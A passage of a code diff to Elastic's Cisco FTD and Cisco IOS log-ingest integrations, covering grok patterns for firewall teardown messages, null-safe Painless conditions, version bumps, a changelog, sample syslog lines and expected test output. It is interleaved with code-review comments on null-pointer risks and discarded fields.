)?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} \(%{CISCO_USER:_temp_.cisco.termination_user}\) - - ^Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) \(%{CISCO_USER:_temp_.cisco.termination_user}\) - - ^Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} - - ^Teardown %{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) - - ^Teardown %{NOTSPACE:network.transport} connection for faddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSDESTIPORHOST}/%{NUMBER}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? 
)?gaddr (?:%{NOTCOLON}:)?%{MAPPEDSRC}/%{NUMBER} laddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSSOURCEIPORHOST}/%{NUMBER}\s*(?:\(%{CISCO_USER:_temp_.cisco.source_username}\))?(\s*type %{NUMBER:_temp_.cisco.icmp_type} code %{NUMBER:_temp_.cisco.icmp_code})? + - ^Teardown (?:Probe )?%{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} from %{NOTCOLON:_temp_.cisco.termination_initiator} \(%{CISCO_USER:_temp_.cisco.termination_user}\) + - ^Teardown (?:Probe )?%{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} from %{NOTCOLON:_temp_.cisco.termination_initiator} + - ^Teardown (?:Probe )?%{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? 
)?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} \(%{CISCO_USER:_temp_.cisco.termination_user}\) + - ^Teardown (?:Probe )?%{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) \(%{CISCO_USER:_temp_.cisco.termination_user}\) + - ^Teardown (?:Probe )?%{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) %{NOTCOLON:event.reason} + - ^Teardown (?:Probe )?%{NOTSPACE:network.transport} (?:state-bypass )?connection %{NOTSPACE:_temp_.cisco.connection_id} (?:for|from) %{NOTCOLON:_temp_.cisco.source_interface}:%{DATA:source.address}/%{NUMBER:source.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.source_username}\)? )?to %{NOTCOLON:_temp_.cisco.destination_interface}:%{DATA:destination.address}/%{NUMBER:destination.port:int}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? 
)?duration (?:%{DURATION:_temp_.duration_hms} bytes %{NUMBER:network.bytes}) + - ^Teardown (?:Probe )?%{NOTSPACE:network.transport} connection for faddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSDESTIPORHOST}/%{NUMBER}\s*(?:\(?%{CISCO_USER:_temp_.cisco.destination_username}\)? )?gaddr (?:%{NOTCOLON}:)?%{MAPPEDSRC}/%{NUMBER} laddr (?:%{NOTCOLON:_temp_.cisco.source_interface}:)?%{ECSSOURCEIPORHOST}/%{NUMBER}\s*(?:\(%{CISCO_USER:_temp_.cisco.source_username}\))?(\s*type %{NUMBER:_temp_.cisco.icmp_type} code %{NUMBER:_temp_.cisco.icmp_code})? pattern_definitions: - HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z-_]{0,62}))*(\\.?|\\b)" + HOSTNAME: "\\b(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62})(?:\\.(?:[0-9A-Za-z][0-9A-Za-z_-]{0,62}))*(\\.?|\\b)" IPORHOST: "(?:%{IP}|%{HOSTNAME})" NOTCOLON: "[^:]*" ECSSOURCEIPORHOST: "(?:%{IP:source.address}|%{HOSTNAME:source.domain})" @@ -1331,7 +1331,7 @@ processors: lang: painless source: | boolean isEmpty(def value) { - return (value instanceof AbstractList? value.size() : value.length()) == 0; + return (value instanceof AbstractList ? value.size() : value.length()) == 0; } def appendOrCreate(Map dest, String[] path, def value) { for (int i=0; i long parse_hms(String s) { long cur = 0, total = 0; @@ -1670,7 +1674,7 @@ processors: } return total + cur; } - if (ctx?.event == null) { + if (ctx.event == null) { ctx['event'] = new HashMap(); } String end = ctx['@timestamp']; @@ -1685,7 +1689,7 @@ processors: # - grok: field: "_temp_.cisco.source_username" - if: 'ctx?._temp_?.cisco?.source_username != null' + if: 'ctx._temp_?.cisco?.source_username != null' ignore_failure: true patterns: - '%{CISCO_DOMAIN_USER:_temp_.cisco.source_username}%{CISCO_SGT}' 
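Review bot: The `(?:Probe )?` group inserted into each of the seven `+ - ^Teardown` patterns is non-capturing, so once the token no longer lands in `network.transport` the fact that the connection was a probe connection is discarded entirely; the same applies to the `Built` pattern in the -400 hunk. If consumers need to distinguish probe connections from ordinary traffic, the token could be captured into a `_temp_.cisco` field and mapped like the other `_temp_.cisco.*` values, and if dropping it is intended a comment on the patterns list such as `# "Probe " marks probe connections and is intentionally not retained` would record that decision. The grok processor starts outside the hunk, and the -1331 hunk that follows on this line is garbled in this view (its parse_hms lines have lost their header), so it was not reviewed.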
@@ -1700,7 +1704,7 @@ processors:
 ignore_missing: true
 - grok:
 field: "_temp_.cisco.destination_username"
- if: 'ctx?._temp_?.cisco?.destination_username != null'
+ if: 'ctx._temp_?.cisco?.destination_username != null'
 ignore_failure: true
 patterns:
 - '%{CISCO_DOMAIN_USER:_temp_.cisco.destination_username}%{CISCO_SGT}'
@@ -1716,11 +1720,11 @@ processors:
 - set:
 field: source.user.name
 value: "{{{ _temp_.cisco.source_username }}}"
- if: 'ctx?.source?.user?.name == null && ctx?._temp_?.cisco?.source_username != null'
+ if: 'ctx.source?.user?.name == null && ctx._temp_?.cisco?.source_username != null'
 - set:
 field: destination.user.name
 value: "{{{ _temp_.cisco.destination_username }}}"
- if: 'ctx?.destination?.user?.name == null && ctx?._temp_?.cisco?.destination_username != null'
+ if: 'ctx.destination?.user?.name == null && ctx._temp_?.cisco?.destination_username != null'
 # Support masked user value
 - grok:
 field: "source.user.name"
@@ -1744,7 +1748,7 @@ processors:
 - grok:
 field: "destination.user.name"
 tag: "grok_destination_user_name"
- if: 'ctx?.destination?.user?.name != null'
+ if: 'ctx.destination?.user?.name != null'
 patterns:
 - (%{CISCO_DOMAIN})?%{CISCO_USER_EMAIL:destination.user.email}
 - (%{CISCO_DOMAIN})?%{CISCO_USER}
@@ -1786,7 +1790,7 @@ processors:
 # mapping in case network.transport contains the iana_number.
 #
 - script:
- if: "ctx?.network?.transport != null"
+ if: "ctx.network?.transport != null"
 lang: painless
 params:
 icmp: 1
@@ -2029,7 +2033,7 @@ processors:
 - set:
 field: source.nat.ip
 value: "{{{_temp_.cisco.mapped_source_ip}}}"
- if: "ctx?._temp_?.cisco?.mapped_source_ip != ctx?.source?.ip"
+ if: "ctx._temp_?.cisco?.mapped_source_ip != ctx.source?.ip"
 ignore_empty_value: true
 - convert:
 field: source.nat.ip
@@ -2038,7 +2042,7 @@ processors:
 - set:
 field: source.nat.port
 value: "{{{_temp_.cisco.mapped_source_port}}}"
- if: "ctx?._temp_?.cisco?.mapped_source_port != ctx?.source?.port"
+ if: "ctx._temp_?.cisco?.mapped_source_port != ctx.source?.port"
 ignore_empty_value: true
 - convert:
 field: source.nat.port
@@ -2047,7 +2051,7 @@ processors:
 - set:
 field: destination.nat.ip
 value: "{{{_temp_.cisco.mapped_destination_ip}}}"
- if: "ctx?._temp_?.cisco.mapped_destination_ip != ctx?.destination?.ip"
+ if: "ctx._temp_?.cisco.mapped_destination_ip != ctx.destination?.ip"
 ignore_empty_value: true
 - convert:
 field: destination.nat.ip
@@ -2056,7 +2060,7 @@ processors:
 - set:
 field: destination.nat.port
 value: "{{{_temp_.cisco.mapped_destination_port}}}"
- if: "ctx?._temp_?.cisco?.mapped_destination_port != ctx?.destination?.port"
+ if: "ctx._temp_?.cisco?.mapped_destination_port != ctx.destination?.port"
 ignore_empty_value: true
 - convert:
 field: destination.nat.port
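Review bot: In the -2047 hunk the new condition `ctx._temp_?.cisco.mapped_destination_ip != ctx.destination?.ip` still dereferences `cisco` without the null-safe operator, unlike its three siblings here and in the -2029 hunk (`_temp_?.cisco?.mapped_source_ip`, `...mapped_source_port`, `...mapped_destination_port`); an event that has `_temp_` but no `_temp_.cisco` would fail this set processor with a null pointer instead of skipping it. The line was already being rewritten for the `ctx?.` cleanup, so it should read `if: "ctx._temp_?.cisco?.mapped_destination_ip != ctx.destination?.ip"`.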
@@ -2072,50 +2076,50 @@ processors: field: network.direction value: inbound if: > - ctx?._temp_?.external_zones != null && - ctx?._temp_?.internal_zones != null && - ctx?.observer?.ingress?.zone != null && - ctx?.observer?.egress?.zone != null && + ctx._temp_?.external_zones != null && + ctx._temp_?.internal_zones != null && + ctx.observer?.ingress?.zone != null && + ctx.observer?.egress?.zone != null && ctx._temp_.external_zones.contains(ctx.observer.ingress.zone) && ctx._temp_.internal_zones.contains(ctx.observer.egress.zone) - set: field: network.direction value: outbound if: > - ctx?._temp_?.external_zones != null && - ctx?._temp_?.internal_zones != null && - ctx?.observer?.ingress?.zone != null && - ctx?.observer?.egress?.zone != null && + ctx._temp_?.external_zones != null && + ctx._temp_?.internal_zones != null && + ctx.observer?.ingress?.zone != null && + ctx.observer?.egress?.zone != null && ctx._temp_.external_zones.contains(ctx.observer.egress.zone) && ctx._temp_.internal_zones.contains(ctx.observer.ingress.zone) - set: field: network.direction value: internal if: > - ctx?._temp_?.external_zones != null && - ctx?._temp_?.internal_zones != null && - ctx?.observer?.ingress?.zone != null && - ctx?.observer?.egress?.zone != null && + ctx._temp_?.external_zones != null && + ctx._temp_?.internal_zones != null && + ctx.observer?.ingress?.zone != null && + ctx.observer?.egress?.zone != null && ctx._temp_.internal_zones.contains(ctx.observer.egress.zone) && ctx._temp_.internal_zones.contains(ctx.observer.ingress.zone) - set: field: network.direction value: external if: > - ctx?._temp_?.external_zones != null && - ctx?._temp_?.internal_zones != null && - ctx?.observer?.ingress?.zone != null && - ctx?.observer?.egress?.zone != null && + ctx._temp_?.external_zones != null && + ctx._temp_?.internal_zones != null && + ctx.observer?.ingress?.zone != null && + ctx.observer?.egress?.zone != null && ctx._temp_.external_zones.contains(ctx.observer.egress.zone) && 
ctx._temp_.external_zones.contains(ctx.observer.ingress.zone) - set: field: network.direction value: unknown if: > - ctx?._temp_?.external_zones != null && - ctx?._temp_?.internal_zones != null && - ctx?.observer?.egress?.zone != null && - ctx?.observer?.ingress?.zone != null && + ctx._temp_?.external_zones != null && + ctx._temp_?.internal_zones != null && + ctx.observer?.egress?.zone != null && + ctx.observer?.ingress?.zone != null && ( ( !ctx._temp_.external_zones.contains(ctx.observer.egress.zone) && @@ -2127,15 +2131,14 @@ processors: ) ) # - # Network Directionality when zones are not configured. + # Network Directionality when zones are not configured. # # Requires Integration option "private_is_internal" (defaults to True) # - script: description: Calculate network.direction if zones are not configured lang: painless - if: "ctx.tags != null && - ctx.tags.contains('private_is_internal') && + if: "ctx.tags?.contains('private_is_internal') == true && ctx.source?.ip != null && ctx.destination?.ip != null && (ctx._temp_?.external_zones == null || @@ -2153,7 +2156,7 @@ processors: } } try { - if (ctx?.network == null) { + if (ctx.network == null) { Map map = new HashMap(); ctx.put('network', map); } @@ -2178,18 +2181,18 @@ processors: field: _temp_.url_domain value: "{{{url.domain}}}" ignore_failure: true - if: ctx?.url?.domain != null + if: ctx.url?.domain != null - uri_parts: field: url.original ignore_failure: true - if: ctx?.url?.original != null + if: ctx.url?.original != null - append: field: url.domain value: "{{{_temp_.url_domain}}}" ignore_failure: true allow_duplicates: false - if: ctx?._temp_?.url_domain != null + if: ctx._temp_?.url_domain != null # # Populate ECS event.code 
@@ -2220,28 +2223,28 @@ processors: # Define ECS Host and Device fields from Cisco ISE pxGrid Endpoint Profile data - remove: field: _temp_.host.type - if: "ctx._temp_?.host?.type != null && ctx._temp_.host.type == 'Invalid ID'" - - gsub: + if: "ctx._temp_?.host?.type == 'Invalid ID'" + - gsub: field: _temp_.host.type pattern: "Device" replacement: " " if: "ctx._temp_?.host?.type != null" - - gsub: + - gsub: field: _temp_.host.type pattern: "^.*Macintosh-Workstation" replacement: "Macintosh:Mac" if: "ctx._temp_?.host?.type != null" - - gsub: + - gsub: field: _temp_.host.type pattern: "^.*Microsoft-Workstation" replacement: "Microsoft:Microsoft" if: "ctx._temp_?.host?.type != null" - - gsub: + - gsub: field: _temp_.host.type pattern: "^.*ChromeBook-Workstation" replacement: "ChromeBook:ChromeBook" if: "ctx._temp_?.host?.type != null" - - gsub: + - gsub: field: _temp_.host.type pattern: "(?:Workstation|[-_])" replacement: " " @@ -2255,19 +2258,19 @@ processors: - host.os.full separator: ":" if: "ctx._temp_?.host?.type != null" - - trim: + - trim: field: device.manufacturer if: "ctx.device?.manufacturer != null" - - trim: + - trim: field: device.model.name if: "ctx.device?.model?.name != null" - - trim: + - trim: field: host.type if: "ctx.host?.type != null" - - trim: + - trim: field: host.os.full if: "ctx.host?.os?.full != null" - + # # Copy _temp_.cisco to its final destination, cisco.asa or cisco.ftd. # 
@@ -2374,13 +2377,13 @@ processors: - connection - start source: >- - if (ctx?.event?.action == null || !params.containsKey(ctx.event.action)) { + if (ctx.event?.action == null || !params.containsKey(ctx.event.action)) { return; } ctx.event.kind = params.get(ctx.event.action).get('kind'); ctx.event.category = params.get(ctx.event.action).get('category').clone(); ctx.event.type = params.get(ctx.event.action).get('type').clone(); - if (ctx?.event?.outcome == null) { + if (ctx.event?.outcome == null) { return; } if (ctx.event.category.contains('network') || ctx.event.category.contains('intrusion_detection')) { @@ -2421,11 +2424,11 @@ processors: # Malware event kind is classified as alert when sha_disposition is "Malware", "Custom Detection" not for other cases. - set: - if: 'ctx?.event?.code == "430005" && ["Malware", "Custom Detection"].contains(ctx.cisco.ftd.security.sha_disposition)' + if: 'ctx.event?.code == "430005" && ["Malware", "Custom Detection"].contains(ctx.cisco.ftd.security.sha_disposition)' field: event.kind value: alert - append: - if: 'ctx?.event?.code == "430005" && !["Malware", "Custom Detection"].contains(ctx.cisco.ftd.security.sha_disposition)' + if: 'ctx.event?.code == "430005" && !["Malware", "Custom Detection"].contains(ctx.cisco.ftd.security.sha_disposition)' field: event.category value: file @@ -2441,7 +2444,7 @@ processors: field: user.name patterns: - "(?:%{DATA}\\\\)?%{GREEDYDATA:user.name}" - if: ctx.user?.name != null && ctx.user?.name.contains('\\') && ["430001", "430002", "430003", "430004", "430005", ""].contains(ctx?.event?.code) + if: ctx.user?.name?.contains('\\') == true && ["430001", "430002", "430003", "430004", "430005", ""].contains(ctx.event?.code) # Set user.name if only destination.user.name is set. - set: 
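Review bot: The two conditions rewritten in the -2421 hunk still index `ctx.cisco.ftd.security.sha_disposition` without null-safe access, so a 430005 event that carries no `cisco.ftd.security` object would fail the condition with a null pointer rather than falling through; the `ctx?.event?.code` cleanup touched these lines but left that as is. Both should use `ctx.cisco?.ftd?.security?.sha_disposition`, e.g. `if: 'ctx.event?.code == "430005" && ["Malware", "Custom Detection"].contains(ctx.cisco?.ftd?.security?.sha_disposition)'` with the negated form on the append. Separately, the grok in the -2441 hunk strips a `DOMAIN\` prefix from `user.name` and throws the domain away; if the data stream maps `user.domain`, capturing it with `%{DATA:user.domain}` would keep it available for correlation. The enclosing processors start outside these hunks.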
@@ -2449,7 +2452,7 @@ processors: field: user.name value: "{{{destination.user.name}}}" ignore_empty_value: true - if: ctx?.user?.name == null + if: ctx.user?.name == null # Remove user field if present and empty - remove: @@ -2463,21 +2466,21 @@ processors: field: rule.name copy_from: cisco.ftd.security_event.access_control_rule_name if: ctx.cisco?.ftd?.security_event?.access_control_rule_name != null - - - set: + + - set: field: rule.ruleset copy_from: cisco.ftd.security_event.ac_policy if: ctx.cisco?.ftd?.security_event?.ac_policy != null - - set: + - set: field: rule.ruleset copy_from: cisco.ftd.security.intrusion_policy - if: ctx.rule?.ruleset == null && ctx.cisco?.ftd?.security?.intrusion_policy != null + if: ctx.rule?.ruleset == null && ctx.cisco?.ftd?.security?.intrusion_policy != null - - set: + - set: field: rule.ruleset copy_from: cisco.ftd.security_event.file_policy - if: ctx.rule?.ruleset == null && ctx.cisco?.ftd?.security_event?.file_policy != null + if: ctx.rule?.ruleset == null && ctx.cisco?.ftd?.security_event?.file_policy != null # Configures observer fields with a copy from cisco and host fields. Later on these might replace host.hostname. - set: 
@@ -2507,77 +2510,77 @@ processors: - append: field: related.ip value: "{{{source.ip}}}" - if: "ctx?.source?.ip != null" + if: "ctx.source?.ip != null" allow_duplicates: false - append: field: related.ip value: "{{{source.nat.ip}}}" - if: "ctx?.source?.nat?.ip != null" + if: "ctx.source?.nat?.ip != null" allow_duplicates: false - append: field: related.ip value: "{{{destination.ip}}}" - if: "ctx?.destination?.ip != null" + if: "ctx.destination?.ip != null" allow_duplicates: false - append: field: related.ip value: "{{{destination.nat.ip}}}" - if: "ctx?.destination?.nat?.ip != null" + if: "ctx.destination?.nat?.ip != null" allow_duplicates: false - append: field: related.user value: "{{{user.name}}}" - if: ctx?.user?.name != null && ctx?.user?.name != '' + if: ctx.user?.name != null && ctx.user.name != '' allow_duplicates: false - append: field: related.user value: "{{{server.user.name}}}" - if: ctx?.server?.user?.name != null && ctx?.server?.user?.name != '' + if: ctx.server?.user?.name != null && ctx.server.user.name != '' allow_duplicates: false - append: field: related.user value: "{{{source.user.name}}}" - if: ctx?.source?.user?.name != null && ctx?.source?.user?.name != '' + if: ctx.source?.user?.name != null && ctx.source.user.name != '' allow_duplicates: false - append: field: related.user value: "{{{destination.user.name}}}" - if: ctx?.destination?.user?.name != null && ctx?.destination?.user?.name != '' + if: ctx.destination?.user?.name != null && ctx.destination.user.name != '' allow_duplicates: false - append: field: related.hash value: "{{{file.hash.sha256}}}" - if: "ctx?.file?.hash?.sha256 != null" + if: "ctx.file?.hash?.sha256 != null" allow_duplicates: false - append: field: related.hosts value: "{{{host.hostname}}}" - if: ctx.host?.hostname != null && ctx.host?.hostname != '' + if: ctx.host?.hostname != null && ctx.host.hostname != '' allow_duplicates: false - append: field: related.hosts value: "{{{observer.hostname}}}" - if: ctx.observer?.hostname 
!= null && ctx.observer?.hostname != '' + if: ctx.observer?.hostname != null && ctx.observer.hostname != '' allow_duplicates: false - append: field: related.hosts value: "{{{destination.domain}}}" - if: ctx.destination?.domain != null && ctx.destination?.domain != '' + if: ctx.destination?.domain != null && ctx.destination.domain != '' allow_duplicates: false - append: field: related.hosts value: "{{{source.domain}}}" - if: ctx.source?.domain != null && ctx.source?.domain != '' + if: ctx.source?.domain != null && ctx.source.domain != '' allow_duplicates: false - append: field: related.hosts value: "{{{source.user.domain}}}" - if: ctx.source?.user?.domain != null && ctx.source?.user?.domain != '' + if: ctx.source?.user?.domain != null && ctx.source.user.domain != '' allow_duplicates: false - append: field: related.hosts value: "{{{destination.user.domain}}}" - if: ctx.destination?.user?.domain != null && ctx.destination?.user?.domain != '' + if: ctx.destination?.user?.domain != null && ctx.destination.user.domain != '' allow_duplicates: false - script: lang: painless @@ -2601,7 +2604,7 @@ processors: ignore_failure: true - remove: field: event.original - if: "ctx?.tags == null || !(ctx.tags.contains('preserve_original_event'))" + if: "ctx.tags?.contains('preserve_original_event') != true" ignore_failure: true ignore_missing: true on_failure: diff --git a/packages/cisco_ftd/manifest.yml b/packages/cisco_ftd/manifest.yml index e441f6b446d..db78efdd4db 100644 --- a/packages/cisco_ftd/manifest.yml +++ b/packages/cisco_ftd/manifest.yml @@ -1,7 +1,7 @@ -format_version: "3.0.0" +format_version: "3.0.3" name: cisco_ftd title: Cisco FTD -version: "3.1.1" +version: "3.2.4" description: Collect logs from Cisco FTD with Elastic Agent. type: integration categories: diff --git a/packages/cisco_ios/_dev/build/docs/README.md b/packages/cisco_ios/_dev/build/docs/README.md index 70f52261b53..db8c146bd16 100644 --- a/packages/cisco_ios/_dev/build/docs/README.md 
+++ b/packages/cisco_ios/_dev/build/docs/README.md @@ -15,6 +15,7 @@ The format of timezones added to Cisco IOS logs does not always match the expect 2. `Timezone Map` - This option is for users who have logs from multiple timezones and want to translate them to the correct timezone. This option allows the user to specify a map of timezones to translate from and to. This option is recommended for advanced users who have logs from multiple timezones being sent to the same integration instance. If the timezone in a Cisco IOS log entry does not match any of the configured mappings, the log will fall back to the timezone specified in the `Timezone` option, and also defaults to `UTC`. +If log messages are relayed resulting in additional syslog header prefixes or other text, this text must be removed for ingestion to be successful. This may be done by adding an appropriate Beats processor to the configuration. ### IOS diff --git a/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios-timezones.log b/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios-timezones.log index dcdf4bbb9cf..b81a9774b6d 100644 --- a/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios-timezones.log +++ b/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios-timezones.log @@ -15,4 +15,4 @@ <190>2361044: sw01: Jan 16 22:11:43.398: %FOO-6-BAR: Test date format. <190>2361044: sw01: Jan 16 22:11:43 UTC: %FOO-6-BAR: Test date format. <190>2361044: sw01: Jan 16 22:11:43: %FOO-6-BAR: Test date format. -<190>2361044: sw01: Jan 16 22:11:43 EDT: %FOO-6-BAR: Test date format. \ No newline at end of file +<190>2361044: sw01: Jan 16 22:11:43 EDT: %FOO-6-BAR: Test date format. diff --git a/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios.log b/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios.log index b92481480a8..91932b10fd2 100644 --- a/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios.log 
+++ b/packages/cisco_ios/_dev/deploy/docker/sample_logs/cisco-ios.log @@ -14,4 +14,4 @@ Jun 20 02:43:30 192.168.100.2 1663327: Jun 20 02:43:29.451: %SEC-6-IPACCESSLOGP: <189>2360957: Jan 6 2022 20:52:12.861: %SYS-5-CONFIG_I: Configured from console by akroh on vty0 (10.100.11.10) <189>: Jan 6 2022 20:54:26.961: %SYS-5-CONFIG_I: Configured from console by akroh on vty0 (10.100.11.10) <190>: Jan 6 2022 20:55:50.671: %SEC-6-IPACCESSLOGDP: list 100 denied icmp 172.16.0.26 -> 10.100.8.34 (3/3), 20 packets -<189>: sw01: Jan 6 2022 21:01:34.964: %SYS-5-CONFIG_I: Configured from console by akroh on vty0 (10.100.11.10) \ No newline at end of file +<189>: sw01: Jan 6 2022 21:01:34.964: %SYS-5-CONFIG_I: Configured from console by akroh on vty0 (10.100.11.10) diff --git a/packages/cisco_ios/changelog.yml b/packages/cisco_ios/changelog.yml index ac368a8fb9f..8e0c77b83cf 100644 --- a/packages/cisco_ios/changelog.yml +++ b/packages/cisco_ios/changelog.yml 
@@ -1,4 +1,49 @@ # newer versions go on top +- version: "1.26.5" + changes: + - description: Fix ingest pipeline warnings + type: bugfix + link: https://github.com/elastic/integrations/pulls/9566 +- version: "1.26.4" + changes: + - description: Fix hostname parsing for names that contain '_' underscore characters. + type: enhancement + link: https://github.com/elastic/integrations/pull/9481 +- version: "1.26.3" + changes: + - description: Fix bad auth grok processor handling of missing MD5 sums. + type: enhancement + link: https://github.com/elastic/integrations/pull/9443 +- version: "1.26.2" + changes: + - description: Fix handling of timezone configurations. + type: bugfix + link: https://github.com/elastic/integrations/pull/9442 +- version: "1.26.1" + changes: + - description: Improve grok processors to better handle generic messages. + type: enhancement + link: https://github.com/elastic/integrations/pull/9102 +- version: "1.26.0" + changes: + - description: Update package spec to 3.0.3. + type: enhancement + link: https://github.com/elastic/integrations/pull/9235 +- version: "1.25.1" + changes: + - description: Remove erroneous period from repeated messages grok + type: bugfix + link: https://github.com/elastic/integrations/pull/9228 +- version: "1.25.0" + changes: + - description: Add support for repeated messages logs + type: enhancement + link: https://github.com/elastic/integrations/pull/9001 +- version: "1.24.2" + changes: + - description: Fix time zone configuration not being applied. + type: bugfix + link: https://github.com/elastic/integrations/pull/9000 - version: "1.24.1" changes: - description: Changed owners diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-asr920.log-expected.json b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-asr920.log-expected.json index 27af0383851..ca666c5240e 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-asr920.log-expected.json 
+++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-asr920.log-expected.json @@ -284,7 +284,7 @@ ] }, { - "@timestamp": "2023-08-03T08:11:02.204Z", + "@timestamp": "2024-08-03T08:11:02.204Z", "cisco": { "ios": { "facility": "LINEPROTO", @@ -326,7 +326,7 @@ ] }, { - "@timestamp": "2023-08-03T08:08:47.142Z", + "@timestamp": "2024-08-03T08:08:47.142Z", "cisco": { "ios": { "access_list": "ACL_CE-SECURITY", @@ -405,7 +405,7 @@ ] }, { - "@timestamp": "2023-08-03T08:04:47.140Z", + "@timestamp": "2024-08-03T08:04:47.140Z", "cisco": { "ios": { "access_list": "ACL_CE-SECURITY", @@ -488,7 +488,7 @@ ] }, { - "@timestamp": "2023-08-03T08:09:55.769Z", + "@timestamp": "2024-08-03T08:09:55.769Z", "cisco": { "ios": { "facility": "SNMP-SW1", diff --git a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-badauth.log b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-badauth.log index 196f50c72d5..a641a04edb3 100644 --- a/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-badauth.log +++ b/packages/cisco_ios/data_stream/log/_dev/test/pipeline/test-badauth.log @@ -1,4 +1,6 @@ <190>9004: Dec 8 20:07:53.081: %TCP-6-BADAUTH: No MD5 digest from 192.168.0.1(64999) to 224.0.0.18(15448) (RST) tableid - 0 <190>9004: Dec 8 20:07:53.081: %TCP-6-BADAUTH: No MD5 digest from 192.168.0.1:64999 to 224.0.0.18:15448 (RST) tableid - 0 <190>9004: Dec 